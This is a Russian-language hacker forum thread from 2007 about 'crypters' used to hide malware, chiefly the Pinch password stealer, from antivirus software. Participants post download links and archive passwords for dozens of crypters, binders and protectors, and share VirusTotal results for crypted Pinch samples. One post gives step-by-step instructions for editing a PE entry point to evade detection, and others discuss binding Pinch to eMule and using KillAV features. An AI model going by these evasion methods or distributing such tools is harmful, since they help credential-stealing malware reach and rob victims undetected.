Zedo83, EP Change рулит....

Zedo83, EP Change рулит....
Кинь сюда ссылочку плз.

Публичные крипторы работают максимум 2 недели, потом есстевствено палятся.

Публичные крипторы работают максимум 2 недели, потом есстевствено палятся.
Ну беспалевность до двух недель в паблике, да криптору - это хорошие результаты ;)

да ну ?
тот же Morphnah_beta2 скока по сети гулял ? ну точно больше месяца без палева ;)
да и сейчал DrWeb, Avast, NOD не палят :)

В этой теме постим всё о крипторах.
Правила:
1) Все благодарности - в личку
2) Все просьбы дать персональную версию - в личку
3) Покупка/Продажа в соответствующий раздел
4) Не занимайтесь оверквотингом (излишним цитированием)
5) На публичных онлайнчекерах не проверяем - буду строго карать минусами провинившихся по любому из пунктов!

Рекомендации:
1) Рекомендую выкладывать запароленные архивы, а пароли выдавать в личке проверенным людям с форума с определённым уровнем репутаии.

Помогите плз. Я склеил пинч с emule(прога такая). Мне ввобщем нужно сделать так чтобы если нету подключения у юзера который её запускает к инету, то он выдает ошибку то что нужно подключиться, а если есть то запускается, мб есть идеи как это можно сделать? Или можно ещё через сайт какой-нибудь, чтобы если он запустил то комп конектился бы к сайту, если нет ответа в течении 10 сек то выдает ошибку, если есть то запускает пинча. Как это можно реализовать? Заранее благодарен.

Помогите плз. Я склеил пинч с emule(прога такая). Мне ввобщем нужно сделать так чтобы если нету подключения у юзера который её запускает к инету, то он выдает ошибку то что нужно подключиться, а если есть то запускается, мб есть идеи как это можно сделать? Или можно ещё через сайт какой-нибудь, чтобы если он запустил то комп конектился бы к сайту, если нет ответа в течении 10 сек то выдает ошибку, если есть то запускает пинча. Как это можно реализовать? Заранее благодарен.
хм... хз. Не занимался этим но предполагаю что тебе необходимо написать/откопать/попросить чтобы за тебя написали чекалку подключения к инету а затем уже запускать пинча. Имхо если так загоняться проще своё что-то писать начинать учиться.

Подскажите плиз... У меня есть последняя приватная версия RPolyCrypt (1.4.4). Но он уже палица и каспером, и вебом.... Подскажите удачную комбинацию паблик криптора + моего RPC 1.4.4.. заранее спс

-=[AL!EN]=- А обновлять RPolyCrypt ???
Подскажите удачную комбинацию паблик криптора
Сам попробуй поиграть с разними криптами. И лучше конечно почитать что-нибудь для модифицирования руками ЗДЕСЬ (http://www.glofff.com/my/chisto.rar) !

В частности криптуешь своим криптом, потом по статье модифицируешь EP крипта, через hiew к примеру и должно сработать.

GlOFF кстати клевая статья. я ее полгода назад читал, когда вообще в it не шарил. ничего не понял. теперь примитивно...))

GlOFF дык в RPC есть вроде фича скрыть Entry Point файла?
спс за ссыль, все равно почитаю...

=-']GlOFF дык в RPC есть вроде фича скрыть Entry Point файла?
спс за ссыль, все равно почитаю...
хы. если ты ее скроешь, файл не будет выполняться)
мб усложнить ее нахождение реверсеру?

-=[AL!EN]=-
дык в RPC есть вроде фича скрыть Entry Point файла?
Дык она спалилась может быть уже ;) Пару своих байтов добавишь или изменишь чтолибо ещё и норма будет. Все зависить будет от того как со статейков разберешься.

-=[AL!EN]=- А обновлять RPolyCrypt ???

Сам попробуй поиграть с разними криптами. И лучше конечно почитать что-нибудь для модифицирования руками ЗДЕСЬ (http://www.glofff.com/my/chisto.rar) !

В частности криптуешь своим криптом, потом по статье модифицируешь EP крипта, через hiew к примеру и должно сработать.
А вообще долго делать свой криптор норм, чтобы который хотяб недели 2 не палился? :)
ps. если ещё нифига не знаешь о програмировании.

А вообще долго делать свой криптор норм, чтобы который хотяб недели 2 не палился? :)
ps. если ещё нифига не знаешь о програмировании.
делать столько, пока не узнаешь дофига.
ЗЫ это индивидуально

1337 EXE Crypter - неплохой криптор , но уже палица =\ вроде не всеми антивирями .
P.S: для колекции сойдет

1337 EXE Crypter
Screen
http://img530.imageshack.us/img530/5993/1337execrypterum9.jpg

Download (http://rapidshare.com/files/51358148/1337_EXE_Crypter.rar)

Cryptic 2.1

Cryptic v2.1 - EXE Crypter

Author:Tughack

Build date: 20 September, 2007

http://img264.imageshack.us/img264/2002/crypticea5f34mt6.jpg

http://img528.imageshack.us/img528/2020/aboutea67efzk9.png

Download (http://rapidshare.com/files/57685724/Cryptic.v2.1_-__xeka.ru_.rar)
Пароль на архив: S*(^Gsay - [xeka.ru]

Спасибо пополню сваю коллекцию исще одним извращенцом.

Крипторы (только в этом топике) (http://forum.antichat.ru/thread33678.html)

ыы ты убить нас захотел? 167 минут я не выживу.

ыы ты убить нас захотел? 167 минут я не выживу.
в соседней теме Isis выкладывал прогу для закачки с рапиды без задержек ^^

Isis А это приват, или теперь уже паблик :D

Паблик http://tughack.net/cryptic/

Приват не выложил бы :)

Isis, от всех прячет? пинч прячет? ща попробую дам отчет..

И так, попробовал закриптовать им pinch. Результаты:
Размер файла увеличился с -46,9 KB (48*057 байт)- до -70,9 KB (72*648 байт)- это не радует.
Отчет нормально приходит на мыло, тоесть пинч продолжает нормально работать.
Проверка на Virustotal:
AhnLab-V3 2007.9.22.0 2007.09.21 -
AntiVir 7.6.0.15 2007.09.21 -
Authentium 4.93.8 2007.09.23 -
Avast 4.7.1043.0 2007.09.22 -
AVG 7.5.0.485 2007.09.23 -
BitDefender 7.2 2007.09.23 -
CAT-QuickHeal 9.00 2007.09.21 -
ClamAV 0.91.2 2007.09.23 -
DrWeb 4.33 2007.09.23 -
eSafe 7.0.15.0 2007.09.23 -
eTrust-Vet 31.2.5154 2007.09.21 -
Ewido 4.0 2007.09.20 -
FileAdvisor 1 2007.09.23 -
Fortinet 3.11.0.0 2007.09.23 -
F-Prot 4.3.2.48 2007.09.23 -
F-Secure 6.70.13030.0 2007.09.21 -
Ikarus T3.1.1.12 2007.09.23 -
Kaspersky 4.0.2.24 2007.09.23 -
McAfee 5125 2007.09.21 -
Microsoft 1.2803 2007.09.23 -
NOD32v2 2545 2007.09.23 -
Norman 5.80.02 2007.09.21 -
Panda 9.0.0.4 2007.09.23 Suspicious file
Prevx1 V2 2007.09.23 -
Rising 19.41.62.00 2007.09.23 -
Sophos 4.21.0 2007.09.23 -
Sunbelt 2.2.907.0 2007.09.22 -
Symantec 10 2007.09.23 -
TheHacker 6.2.5.066 2007.09.22 -
VBA32 3.12.2.4 2007.09.23 -
VirusBuster 4.3.26:9 2007.09.23 -
Webwasher-Gateway 6.0.1 2007.09.21 -

Оценка: 4/5

Sutted Да, не фиговый такой отчет, посмотрим, что будет через недельку.

Оценка 4 из 5? =\
Вес файла здесь никак не может оцениться в 1 бал..
Главное что говорит вирустотал

Хорошо что тотал молчит =\ Но НАдОЛГО ли?

P.S n0ne Прав :mad:

Раз вирустотал что-то сказал, значит через пару дней, если не часов это будет уже не актуально)

n0ne, я не думаю то что через пару дней он будет палиться вирус тоталом, думаю как минимум работать стабильно без палева будет недельку точно...
Isis, вес имеет большое значение, хоть и не для меня, но вообще.

я не думаю то что через пару дней он будет палиться вирус тоталом, думаю как минимум работать стабильно без палева будет недельку точно

Да недельку не протянет. Уже проверено пара десятков файлов pinch.exe закриптованных им.

У мну вопрсик про PolyCrypt 1.2:Там тема есть KillAV...надо указать путь к списку этих самых AV в *.txt формате)Нужно ли указывать расширение *.exe в имени AV,или можно просто имя?
И ещё про нод32...у меня когда он стоял,чтобы загрузить с нета тот же Брут,надо было его отключать.Я отключал,но когда распаковывал архив с Брутом,самого брута там не было(Я залез в диспетчер задач,и увидел там процесс nod32krnl.dll(вроде так,точно не помню,но расширение *.dll сто пудово).Причём когда я его убивал,он появлялся опять через 2-3 секунды(Пришлось нод снести нахрен.Как быть с этим?

Очень блин странно 1337 EXE Crypter и Cryptic 2.1, которая здесь - http://forum.antichat.ru/threadnav49667-1-10.html Прога один в один криптует, разница в названии, дизайне, иконки! ;)

y']У мну вопрсик про PolyCrypt 1.2:Там тема есть KillAV...надо указать путь к списку этих самых AV в *.txt формате)Нужно ли указывать расширение *.exe в имени AV,или можно просто имя?
И ещё про нод32...у меня когда он стоял,чтобы загрузить с нета тот же Брут,надо было его отключать.Я отключал,но когда распаковывал архив с Брутом,самого брута там не было(Я залез в диспетчер задач,и увидел там процесс nod32krnl.dll(вроде так,точно не помню,но расширение *.dll сто пудово).Причём когда я его убивал,он появлялся опять через 2-3 секунды(Пришлось нод снести нахрен.Как быть с этим?
Нужно просто отлючить в Нод32 "Amon" тогда он не будет кричять на трой.

это криптором назвать сложно.. куча мусора, Visual Basic, инжект в себя..
даже если на виртотале не палится то спалится проактивкой Кава7 при запуске
и сигнатуру аверы быстро снимут

http://img407.imageshack.us/img407/9306/fghfhpj4.jpg


http://rapidshare.com/files/57986094/CDS.rar.html

Themida [1.9.3.0]

[+] Added support for VS2007 applications

[+] Added File Patching option to support signed files

[+] Added support to protect DLLs with empty relocation table

[+] Improved compatibility with some .NET applicatins under Vista

[!] Fixed compatibility wrapping ICMP.IcmpCreateFile

[!] Fixed compatibility in some applicatons with API-Wrapper enabled and running under Wine

[!] .NET: fixed compatibility issue loading libraries as image resource

[!] Fixed compatibility with some DLLs protected with Code Virtualizer + Themida/WinLicense

[!] Minor bugs fixed
1.9.3.0


http://www.oreans.com/Release/ThemidaDemo.zip

http://rapidshare.com/files/58162169/Themida193_Loader.rar.html

Помогите закриптовать пинч3 от васьки фемидой
Настраиваю опции, не сжимаю и не криптую, открываю в фемиде, все опции по умолчанию, криптую. При проверке процесс висит в списке задач, пока его не завершишь в ручную. Отчет не идет. Проверялось на двух разных виндах, и везде такая же лажа.

КучО
Утя может файрвол работает может по этой причине он у тебя в процэсах весит.

КучО А попробуй другой версией фемиды паконуть.

КучО а попробуй паконуть PE Tools...результат будет офигенный.
А вообще крептовать пинч3 фемидой ЖЕСТЬ!
:D :D :D :D

КучО
Утя может файрвол работает может по этой причине он у тебя в процэсах весит.
В том-то все и дело, если отключить все, незакриптованный или закриптованный чем-либо другим (но палящимся), работает, а фемидовский висит себе и все...
Проверялось на фемиде 1.9.3.0. По беспалевности это просто зе бест!!!
В чем проблема, не понимаю... Отпишитесь, у кого работает?
КучОа попробуй паконуть PE Tools...результат будет офигенный.
Паконуть? Там же нет функций упаковщика... Или ты имеешь в виду в PE Editor поправить заголовок?..
А вообще крептовать пинч3 фемидой ЖЕСТЬ!
А чем криптовать? Все остальное палится с ходу. Или ты предлагаешь криптор у тебя купить? Это можно еще хотя бы к инсталяхе приклеить, а на все остальное хоть наизнанку вывернись, ав орать будет...

КучО , PE Tools=>PE Editor(EXE который надо крептануть)=>Optional Header=>Entry Point=>В текстовом поле последний символ или цифру ,меняеш на близкий этому символу или цифре,символ или цифру..т.е 0000201A будет 0000201B
или 00002011 будет 00002012...потом жмеш сэйв и вуаля твой пинч3 не палится основными аверами,а остальными сильно будет палится. Рекомендуется использовать в совокупности с Pohernah 1.0.3. Этот способ весьма примитивен,есть куда более эффективные,но они сложны.

Вот результат такого крипта:

Antivirus;Version;Last Update;Result
AhnLab-V3;2007.9.28.0;2007.09.27;-
AntiVir;7.6.0.15;2007.09.27;-
Authentium;4.93.8;2007.09.27;W32/Trojan.AUFT
Avast;4.7.1043.0;2007.09.26;Win32:Ldpinch-AFZ
AVG;7.5.0.488;2007.09.27;-
BitDefender;7.2;2007.09.27;-
CAT-QuickHeal;9.00;2007.09.27;(Suspicious) - DNAScan
ClamAV;0.91.2;2007.09.26;Trojan.Spy-9466
DrWeb;4.33;2007.09.27;-
eSafe;7.0.15.0;2007.09.23;Suspicious Trojan/Worm
eTrust-Vet;31.2.5168;2007.09.27;-
Ewido;4.0;2007.09.27;Not-A-Virus.HackTool.Win32.Agent.z
FileAdvisor;1;2007.09.27;-
Fortinet;3.11.0.0;2007.09.27;-
F-Prot;4.3.2.48;2007.09.26;W32/Trojan.AUFT
F-Secure;6.70.13030.0;2007.09.27;-
Ikarus;T3.1.1.12;2007.09.27;Virus.Win32.Ldpinch.AF Z
Kaspersky;7.0.0.125;2007.09.27;-
McAfee;5129;2007.09.27;-
Microsoft;1.2803;2007.09.27;VirTool:Win32/Obfuscator.K
NOD32v2;2554;2007.09.26;-
Norman;5.80.02;2007.09.27;-
Panda;9.0.0.4;2007.09.27;-
Prevx1;V2;2007.09.27;-
Rising;19.42.32.00;2007.09.27;-
Sophos;4.21.0;2007.09.27;-
Sunbelt;2.2.907.0;2007.09.26;Elkern.a (v)
Symantec;10;2007.09.27;-
TheHacker;6.2.6.072;2007.09.27;-
VBA32;3.12.2.4;2007.09.26;Trojan-PSW.Win32.LdPinch.bgj
VirusBuster;4.3.26:9;2007.09.27;-
Webwasher-Gateway;6.0.1;2007.09.27;Virus.Win32.FileInfector. gen (suspicious)

1337 EXE Binder.rar 240KB Sep 19 2007 09:20:02 AM (http://www.to0l-base.de/Packer_Crypter/1337%20EXE%20Binder.rar)
acrypt.rar 1418KB May 23 2007 12:02:10 PM (http://www.to0l-base.de/Packer_Crypter/acrypt.rar)
alexprot.rar 52KB Jun 08 2007 08:07:04 PM (http://www.to0l-base.de/Packer_Crypter/alexprot.rar)
AlphaCodeCrypter.zip 279KB May 23 2007 12:02:24 PM (http://www.to0l-base.de/Packer_Crypter/AlphaCodeCrypter.zip)
amokk_exe_joiner.rar 288KB May 23 2007 12:02:38 PM (http://www.to0l-base.de/Packer_Crypter/amokk_exe_joiner.rar)
Astaroth.rar 224KB Jun 24 2007 06:32:33 PM (http://www.to0l-base.de/Packer_Crypter/Astaroth.rar)
asylum_binder.rar 198KB May 23 2007 12:02:48 PM (http://www.to0l-base.de/Packer_Crypter/asylum_binder.rar)
AV Devil 2.1.rar 208KB Aug 04 2007 04:54:48 PM (http://www.to0l-base.de/Packer_Crypter/AV%20Devil%202.1.rar)
AV Devil 2.rar 208KB May 23 2007 12:02:59 PM (http://www.to0l-base.de/Packer_Crypter/AV%20Devil%202.rar)
Binder_by_KillerTomate_&_d1ng0d0gt0r.rar 292KB May 23 2007 12:03:13 PM (http://www.to0l-base.de/Packer_Crypter/Binder_by_KillerTomate_&_d1ng0d0gt0r.rar)
BlindSpotv1.0 Source Visual C++.rar 38KB May 23 2007 12:03:15 PM (http://www.to0l-base.de/Packer_Crypter/BlindSpotv1.0%20Source%20Visual%20C++.rar)
CC-Joiner.rar 276KB Sep 13 2007 03:53:02 AM (http://www.to0l-base.de/Packer_Crypter/CC-Joiner.rar)
Celsius_Crypt_2 S.E.rar 212KB Sep 13 2007 03:52:27 AM (http://www.to0l-base.de/Packer_Crypter/Celsius_Crypt_2%20S.E.rar)
coolbinder_2.2.rar 1812KB May 23 2007 12:04:44 PM (http://www.to0l-base.de/Packer_Crypter/coolbinder_2.2.rar)
Deception4_FUD.rar 1300KB Sep 06 2007 01:34:21 AM (http://www.to0l-base.de/Packer_Crypter/Deception4_FUD.rar)
dl-excalibur.rar 35KB May 23 2007 12:04:47 PM (http://www.to0l-base.de/Packer_Crypter/dl-excalibur.rar)
ees_binder_1.0.rar 242KB May 23 2007 12:04:59 PM (http://www.to0l-base.de/Packer_Crypter/ees_binder_1.0.rar)
EXEcrypt v1.0.rar 6KB Sep 06 2007 11:21:48 PM (http://www.to0l-base.de/Packer_Crypter/EXEcrypt%20v1.0.rar)
ExE SaX 0.91.rar 44KB Jun 08 2007 08:13:21 PM (http://www.to0l-base.de/Packer_Crypter/ExE%20SaX%200.91.rar)
exe_2_lnk.rar 87KB Jul 29 2007 02:30:25 AM (http://www.to0l-base.de/Packer_Crypter/exe_2_lnk.rar)
exe_bundle_2.8.rar 167KB May 23 2007 12:05:07 PM (http://www.to0l-base.de/Packer_Crypter/exe_bundle_2.8.rar)
eXPressorProfessional1.5.0.1.rar 1113KB Sep 15 2007 01:42:34 AM (http://www.to0l-base.de/Packer_Crypter/eXPressorProfessional1.5.0.1.rar)
Ext Changer.rar 60KB Jun 24 2007 06:32:37 PM (http://www.to0l-base.de/Packer_Crypter/Ext%20Changer.rar)
F.B.I.rar 223KB Jun 24 2007 06:32:48 PM (http://www.to0l-base.de/Packer_Crypter/F.B.I.rar)
fast_upx_0.1.rar 301KB May 23 2007 12:05:22 PM (http://www.to0l-base.de/Packer_Crypter/fast_upx_0.1.rar)
fategate_exejoiner.rar 163KB May 23 2007 12:05:30 PM (http://www.to0l-base.de/Packer_Crypter/fategate_exejoiner.rar)
File Joiner1.5.rar 897KB Sep 19 2007 09:20:45 AM (http://www.to0l-base.de/Packer_Crypter/File%20Joiner1.5.rar)
file_injector_2.rar 89KB May 23 2007 12:05:35 PM (http://www.to0l-base.de/Packer_Crypter/file_injector_2.rar)
freshbind_2.0.rar 742KB May 23 2007 12:06:12 PM (http://www.to0l-base.de/Packer_Crypter/freshbind_2.0.rar)
Icon Changer.rar 8KB May 23 2007 12:06:12 PM (http://www.to0l-base.de/Packer_Crypter/Icon%20Changer.rar)
IconChanger37 + Patch.rar 1138KB Jun 09 2007 06:29:22 PM (http://www.to0l-base.de/Packer_Crypter/IconChanger37%20+%20Patch.rar)
Icon Manager.rar 271KB Aug 14 2007 02:29:32 AM (http://www.to0l-base.de/Packer_Crypter/Icon%20Manager.rar)
Inliner.rar 47KB Jun 08 2007 08:06:57 PM (http://www.to0l-base.de/Packer_Crypter/Inliner.rar)
interlaced_2.0.rar 305KB May 23 2007 12:06:27 PM (http://www.to0l-base.de/Packer_Crypter/interlaced_2.0.rar)
JABT1.2.1.rar 55KB Jun 16 2007 07:30:02 PM (http://www.to0l-base.de/Packer_Crypter/JABT1.2.1.rar)
JABT_Binder.rar 419KB Sep 13 2007 03:52:48 AM (http://www.to0l-base.de/Packer_Crypter/JABT_Binder.rar)
kaOs undetecter.rar 266KB Jul 30 2007 05:25:32 PM (http://www.to0l-base.de/Packer_Crypter/kaOs%20undetecter.rar)
Kriptirnik.rar 4076KB Sep 19 2007 09:23:58 AM (http://www.to0l-base.de/Packer_Crypter/Kriptirnik.rar)
Magic Binder v1.2.rar 0KB Sep 19 2007 09:18:55 AM (http://www.to0l-base.de/Packer_Crypter/Magic%20Binder%20v1.2.rar)
microjoiner_1.5.rar 15KB May 23 2007 12:06:28 PM (http://www.to0l-base.de/Packer_Crypter/microjoiner_1.5.rar)
MicroJoiner_v1.6 + Source.zip 58KB May 23 2007 12:06:32 PM (http://www.to0l-base.de/Packer_Crypter/MicroJoiner_v1.6%20+%20Source.zip)
moruk creW Binder PubliC Edition.rar 73KB Jul 29 2007 02:50:33 PM (http://www.to0l-base.de/Packer_Crypter/moruk%20creW%20Binder%20PubliC%20Edition.rar)
MVMv1.0_stub.stealthed.by.kokaiin.rar 1861KB May 23 2007 12:08:01 PM (http://www.to0l-base.de/Packer_Crypter/MVMv1.0_stub.stealthed.by.kokaiin.rar)
nakedbind_1.0.rar 117KB May 23 2007 12:08:07 PM (http://www.to0l-base.de/Packer_Crypter/nakedbind_1.0.rar)
Nephron Binder.rar 263KB Jul 29 2007 02:30:37 AM (http://www.to0l-base.de/Packer_Crypter/Nephron%20Binder.rar)
NME 1.1.rar 235KB May 23 2007 12:08:20 PM (http://www.to0l-base.de/Packer_Crypter/NME%201.1.rar)
NTPacker.rar 63KB May 23 2007 12:08:24 PM (http://www.to0l-base.de/Packer_Crypter/NTPacker.rar)
NW_Binder_Source_Code.rar 91KB May 23 2007 12:08:28 PM (http://www.to0l-base.de/Packer_Crypter/NW_Binder_Source_Code.rar)
NW_Binder_Source_VB.rar 91KB May 23 2007 12:08:33 PM (http://www.to0l-base.de/Packer_Crypter/NW_Binder_Source_VB.rar)
OSC-Crypter-haZl0oh.rar 352KB Sep 06 2007 11:24:56 PM (http://www.to0l-base.de/Packer_Crypter/OSC-Crypter-haZl0oh.rar)
PiCrypther.rar 45KB Aug 05 2007 08:49:57 PM (http://www.to0l-base.de/Packer_Crypter/PiCrypther.rar)
PlutoCrypt.rar 3579KB Sep 06 2007 11:24:40 PM (http://www.to0l-base.de/Packer_Crypter/PlutoCrypt.rar)
Pohernah_3_cracked_full_by_haZl0oh.rar 16KB Sep 06 2007 11:21:48 PM (http://www.to0l-base.de/Packer_Crypter/Pohernah_3_cracked_full_by_haZl0oh.rar)
Pussy Crypter_pub_stub_v1.rar 83KB Jul 31 2007 02:23:29 AM (http://www.to0l-base.de/Packer_Crypter/Pussy%20Crypter_pub_stub_v1.rar)
Redbinder2.0.1.rar 755KB Sep 19 2007 09:19:49 AM (http://www.to0l-base.de/Packer_Crypter/Redbinder2.0.1.rar)
scramble_tool_0.2.rar 485KB May 23 2007 12:09:03 PM (http://www.to0l-base.de/Packer_Crypter/scramble_tool_0.2.rar)
Sexe Crypter.rar 238KB May 23 2007 12:09:14 PM (http://www.to0l-base.de/Packer_Crypter/Sexe%20Crypter.rar)
SkDUndetectabler3.rar 278KB Sep 19 2007 09:19:09 AM (http://www.to0l-base.de/Packer_Crypter/SkDUndetectabler3.rar)
stealth_tools_2.0.rar 175KB May 23 2007 12:09:25 PM (http://www.to0l-base.de/Packer_Crypter/stealth_tools_2.0.rar)
Stripper 2.07f.rar 178KB May 23 2007 12:09:34 PM (http://www.to0l-base.de/Packer_Crypter/Stripper%202.07f.rar)
Super_Binder.rar 413KB Jul 03 2007 07:27:19 AM (http://www.to0l-base.de/Packer_Crypter/Super_Binder.rar)
s_binder_1.0.rar 83KB May 23 2007 12:08:39 PM (http://www.to0l-base.de/Packer_Crypter/s_binder_1.0.rar)
TAOD.rar 90KB Jun 08 2007 08:13:25 PM (http://www.to0l-base.de/Packer_Crypter/TAOD.rar)
tElock 0.98.rar 79KB Sep 06 2007 01:44:08 AM (http://www.to0l-base.de/Packer_Crypter/tElock%200.98.rar)
Themida_v1.8.5.5_cracked.rar 7714KB May 23 2007 12:15:47 PM (http://www.to0l-base.de/Packer_Crypter/Themida_v1.8.5.5_cracked.rar)
trojanz_undetected.rar 261KB May 23 2007 12:16:00 PM (http://www.to0l-base.de/Packer_Crypter/trojanz_undetected.rar)
unGHF_0.3_with_src.rar 24KB Jun 08 2007 08:06:58 PM (http://www.to0l-base.de/Packer_Crypter/unGHF_0.3_with_src.rar)
unhidepe.rar 21KB Jun 08 2007 08:07:00 PM (http://www.to0l-base.de/Packer_Crypter/unhidepe.rar)
UnLimited Crypter 1.0.rar 152KB Jul 29 2007 02:30:20 AM (http://www.to0l-base.de/Packer_Crypter/UnLimited%20Crypter%201.0.rar)
unstealthpe.rar 26KB Jun 08 2007 08:07:00 PM (http://www.to0l-base.de/Packer_Crypter/unstealthpe.rar)
UnTheMida.rar 1893KB Jun 08 2007 08:16:29 PM (http://www.to0l-base.de/Packer_Crypter/UnTheMida.rar)
UPX-iT 1.6.2.rar 1471KB May 23 2007 12:17:37 PM (http://www.to0l-base.de/Packer_Crypter/UPX-iT%201.6.2.rar)
upx300w.zip 310KB May 23 2007 12:16:25 PM (http://www.to0l-base.de/Packer_Crypter/upx300w.zip)
UPX_Tool_1.02_Install.rar 197KB May 23 2007 12:16:10 PM (http://www.to0l-base.de/Packer_Crypter/UPX_Tool_1.02_Install.rar)
VBscrypt.rar 4KB May 23 2007 12:17:38 PM (http://www.to0l-base.de/Packer_Crypter/VBscrypt.rar)
yab_2.0.rar 385KB May 23 2007 12:17:57 PM (http://www.to0l-base.de/Packer_Crypter/yab_2.0.rar)
yoda's Crypter 1.3.rar 30KB May 23 2007 12:18:00 PM (http://www.to0l-base.de/Packer_Crypter/yoda%27s%20Crypter%201.3.rar)
Пароль для всех архивов: to0l-base

Спасибо за исправку поста Isis'у :).

спасибо добавил в репу)
неподскажешь какие из них самые норм и не палятся?)

ХЗ попробуй сам :) какие из них не палатса .

NeXArmAor, спасибо тебе огромное!!! Немного покопал еще и получил еще на несколько антивирей меньше!!! ++++++++++++ Фемиду в топку! Хотя и не палится ничем! Еще раз спасибо!!

[G!X] Protector v1.2
ACProtect v2.0
ACProtect Professional Edition
AlexProt v1.0
AntiDote v1.4 Special Edition
antiOllyDBG
AREA51 Cryptor
ARM Protector v0.1.rar
Armadillo v4.4
ASDPack
AsPack v2.12
ASProtect 2.11 SKE 3.13
AZProtect
BJFnt v1.3
Cexe (NT Only)
CigiCigi File Crypter v1.0
Code Virtualizer v1.3.1.0
CodeCrypt v0.16 Beta
CodeFusion v3.0
CRYPToCRACk's v0.9.2
CryptoFilez v2.0
CryptX v1.0
DBPE v2.33
Diet
DotFix NiceProtect v2.3
Enigma Protector v1.12
eXcalibur v1.03
ExE Evil v1.0
EXE Shield v2.8
EXE Stealth v2.75
EXE Stealth v2.76
exe32pack v1.42
EXECryptor 2.4.0 RC1.02
EXECryptor
ExeFog v1.1
ExeSax v0.9.1
ExeShield Cryptor v1.3 RC
eXPressor Professional v1.5.0.1 Cracked
eXPressor Standard v1.5.0.1
EZIP v1.0
FSG v2.0
GHF Protector v1.0
Hide&Protect v1.016
ICrypt v1.0
iNF Cryptor
KaOs RAT eXecutable Undetecter
Krypton v0.5
LameCrypt v1.0
LuCypher v1.1
LZEXE v1.0
MEW 11 SE v1.2
Minke Cryptor v1.0.1
MoleBox Pro v2.6.1
Morphine v2.7
Morphine v3.5
Morphnah Beta 2
Morphnah Beta
MPack v0.0.2
MSLRH v0.31a
MSLRH v0.32a
NakedPacker v1.0
NeoLite v2.0
NET Reactor v3.2.0.6
NFO v1.0
NME v1.1
NOmeR1
NoodleCrypt v2.0
NovaCipher
nPack v1.1 Beta
NsPack v3.4
NsPack v3.7
NTkrnl Protector v0.1
NTkrnl Protector v0.15 Cracked
Obsidium v1.3.0.4
Open Source Code Crypter v1.0
ORiEN v2.11
Pack v1.0
PB Encryptor v1.0
PE Ninja v1.0
PE Mutilator v1.6
PECompact v2.70a
PEID
PELock
PELOCKnt v2.04
PEncrypt v4.0
PEPack v1.0
PESpin v1.3
Pestil v1.0
Petite v2.2
Petite v2.3
PI Cryptor v1.2
PI-Cryptor v1.1
Pohernah v1.0.2
Pohernah v1.0.3
Poison Ivy v2.2.0 Cryptor
pOke Crypter
PolyCrypter v.1.2
PowerShield v1.0
PrincessSandy v1.0
Private EXE Protector v2.0
Private EXE Protector v2.2
Private Personal Packer v1.0.2
Ps Crypter
Punisher
Pussy Crypter v1 Private Edition
QrYPt0r
RCryptor v1.1
RCryptor v1.3
RCryptor v1.4
RCryptor v1.5
RCryptor v1.6 Beta
RCryptor Private Edition
RPolyCrypt.rar
Russian Cryptor v1.0
Scrambler Special Edition
ScrambleTool v0.2.0.2
SDProtector Pro Edition v1.12
SDProtector Pro Edition v1.16
Sexe Crypter v1.1
Shrinker
SimbiOZ
Simple Crypter v1.2
SixxPack v2.2
SkD Undetectabler Pro V2.0
SLH v3.0 Crypter
StealthTools v2.0
Stone's PE-EXE Encrypter v1.13
STUD RC4 v1.0
SVK Protector v1.43
Software Passport
tElock v0.98
tElock v0.99
Themida v1.8.5.5
Themida v1.9.1
UnDo Crypter
unkOwn Crypter
UnoPiX v1.0
UPX Crypt
UPX Mutanter v0.2
UPXUP
VBCrypt
VMProtect v1.1
VMProtect v1.22.3
VPacker v0.02
VProtect v1.3
Wind of Crypt v1.0
WinLicense v1.4.0.2
WinLicense v1.8.5.5
WinLite
Xtreme Protector v1.8
Yoda Crypter v1.3
Yoda's Protector v1.03
StasFodidoCrypter v1.0
Cryptic v1.5

http://rapidshare.com/files/58481400/Binder--crypter1.rar
http://rapidshare.com/files/58477932/Binder--crypter2.rar

Пароль на архив: psp3.cabanova.de

http://crypter-base.dl.am/

КучО , PE Tools=>PE Editor(EXE который надо крептануть)=>Optional Header=>Entry Point=>В текстовом поле последний символ или цифру ,меняеш на близкий этому символу или цифре,символ или цифру..т.е 0000201A будет 0000201B
или 00002011 будет 00002012...потом жмеш сэйв и вуаля твой пинч3 не палится основными аверами,а остальными сильно будет палится. Рекомендуется использовать в совокупности с Pohernah 1.0.3. Этот способ весьма примитивен,есть куда более эффективные,но они сложны.



пинч 3 от васьки таким способом от каспера не скрылся
обработанный потом нахом 1,0,3 стал неработоспособным

так что пока моя комбинация из паблик криптеров рулит =) ниодин антивирус не определяет =))

Zedo83, так штука в том,что надо сначала нахом,а потом PE Tools...а не наоборот. И к тому же корректность работы этой техники крипта надо сначала понять,возможно ты допустил ошибку.

AhnLab-V3 2007.9.29.0 2007.09.28 -
AntiVir 7.6.0.18 2007.09.30 -
Authentium 4.93.8 2007.09.29 -
Avast 4.7.1043.0 2007.09.30 -
AVG 7.5.0.488 2007.09.30 BackDoor.Generic8.RAG
BitDefender 7.2 2007.09.30 Trojan.Loader.B
CAT-QuickHeal 9.00 2007.09.29 Backdoor.Agent.bdr
ClamAV 0.91.2 2007.09.30 -
DrWeb 4.33 2007.09.30 -
eSafe 7.0.15.0 2007.09.30 -
eTrust-Vet 31.2.5174 2007.09.30 -
Ewido 4.0 2007.09.30 -
FileAdvisor 1 2007.09.30 -
Fortinet 3.11.0.0 2007.09.30 W32/Agent.BDR!tr.bdr
F-Prot 4.3.2.48 2007.09.29 -
F-Secure 6.70.13030.0 2007.09.29 Backdoor.Win32.Agent.bdr
Ikarus T3.1.1.12 2007.09.30 Trojan.Loader.B
Kaspersky 7.0.0.125 2007.09.30 Backdoor.Win32.Agent.bdr
McAfee 5130 2007.09.28 -
Microsoft 1.2803 2007.09.30 -
NOD32v2 2560 2007.09.30 -
Norman 5.80.02 2007.09.28 W32/Agent.CMQT
Panda 9.0.0.4 2007.09.30 Suspicious file
Prevx1 V2 2007.09.30 -
Rising 19.42.61.00 2007.09.30 -
Sophos 4.22.0 2007.09.30 -
Sunbelt 2.2.907.0 2007.09.28 -
Symantec 10 2007.09.30 -
TheHacker 6.2.6.074 2007.09.30 Backdoor/Agent.bdr
VBA32 3.12.2.4 2007.09.30 Backdoor.Win32.Agent.bdr
VirusBuster 4.3.26:9 2007.09.30 -
Webwasher-Gateway 6.0.1 2007.09.30 -
Результат: 11/32 (34.38%)
не плохо себя показал Cryptic.v2.1

Isis перезалей пожалст на dump.ru а то мне долго ждать пока время сброситься+докачать врятле смогу.

